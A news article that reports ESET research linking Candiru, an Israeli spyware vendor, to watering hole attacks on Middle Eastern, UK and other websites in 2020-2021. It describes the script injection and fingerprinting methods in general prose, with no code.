New evidence suggests that Israeli spyware vendor Candiru, which was recently added to the US government’s economic blacklist, carried out “watering hole” attacks on high-profile targets in the UK and the Middle East.
ESET revealed in a report that the hacked websites belonged to media outlets in the United Kingdom, Saudi Arabia, Yemen, and Hezbollah; to Iranian government institutions (Ministry of Foreign Affairs), Syrian government institutions (including the Ministry of Electricity), and Yemeni government institutions (including the Ministries of Interior and Finance); ISPs in Yemen and Syria; and aerospace/military tech companies in South Africa and Italy. The attackers also developed a website that looked like it was from a medical trade fair in Germany.
The strategic web compromises are thought to have happened in two waves when the malicious scripts were removed from the targeted domains. The first started in March 2020 and ended in August 2020, and the second began in January 2021 and ended in early August 2021.
Watering hole attacks are a type of highly targeted intrusion in which a specific group of end-users is infected via backdooring websites that the group is known to visit to gain access to their computers for further exploitation.
According to the Slovak cybersecurity firm, the hijacked websites are merely used as a jumping-off point to reach the ultimate targets. Kaspersky linked the second wave to a threat actor known as Karkadann, noting commonalities in tactics, techniques, and procedures (TTPs).
The initial attack chains comprised inserting JavaScript code into webpages from a remote attacker-controlled domain, which was aimed to capture and exfiltrate target machine I.P. geolocation and system information. The last stage resulted in a possible browser remote code execution hack, allowing the attackers to take control of the computers.
The second wave, which began in January 2021, was stealthier. The malicious code was embedded in genuine WordPress scripts (“wp-embed.min.js“) rather than being added directly to the main HTML page, using the mechanism to load a script from a server under the attacker’s control. Furthermore, the fingerprinting script captured the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins in addition to system metadata.
The specific exploit and payload sent have yet to be determined. “This demonstrates that the operators have chosen to focus their operations and do not want to burn their zero-day exploits,” stated ESET malware researcher Matthieu Faou.
The event’s connections to Candiru originate from the fact that some of the attackers’ command-and-control servers are identical to those previously known as belonging to the Israeli firm, not to mention the fact that it has browser-based remote code execution flaws in its arsenal, suggesting the probability that the watering holes’ owners are Candiru clients.
According to ESET, the attackers stopped operating around the end of July 2021, which coincided with public announcements regarding Candiru’s use of various zero-day vulnerabilities in the Chrome browser to target victims in Armenia.